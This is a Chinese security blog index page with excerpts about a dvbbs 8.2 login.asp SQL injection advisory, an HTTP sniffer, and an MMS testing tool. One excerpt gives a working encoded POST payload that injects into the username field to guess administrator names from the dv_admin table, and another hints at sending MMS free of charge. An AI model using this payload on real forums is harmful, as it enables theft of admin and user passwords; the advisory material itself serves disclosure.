鬼仔's Blog

鬼仔注：这次来个详细的。

by where(hackerb@126.com)

漏洞描述：
中国应用最广泛的论坛程序，最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp
Login.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号，导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。

漏洞等级：
高危
阅读全文 »

作者：open
来源：open’s blog

用VB写这种程序我觉得那个.........
或许偶还菜吧.....
阅读全文 »

来源：PT42软件

SniffX 是一个HTTP协议的网络嗅探器，协议分析器和HTTP文件重建工具。它可以捕捉局域网内的含有HTTP协议的IP数据包，并对其内容进行解码分析。通过它，您可以看到现在都访问了哪些网页，这些网页的内容是什么。

最新版本 SniffX 1.0
阅读全文 »

作者：zwell
来源：NOSEC

用来做彩信安全测试的，发出来大家玩一玩。不知道怎么用的，或者不知道如何用GPRS MODEM拨号的朋友就不用下载了。这是针对MM1接口非常低层的测试工具。想知道怎么免费发彩信吗？呵呵，慢慢研究吧！
阅读全文 »

来源：80sec

漏洞公告:http://seclists.org/bugtraq/2008/May/0330.html

利用方式:一个典型的sql注射漏洞,按照公告里说的用

password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271

就可触发.
阅读全文 »

来源：seclists

email:
hackerb_at_hotmail.com

Subject:
dvbbs8.2(access/sql)version login.asp remote sql injection

danger level:
critical/High

info:
dvbbs is prone to multiple sql injection security flaw
阅读全文 »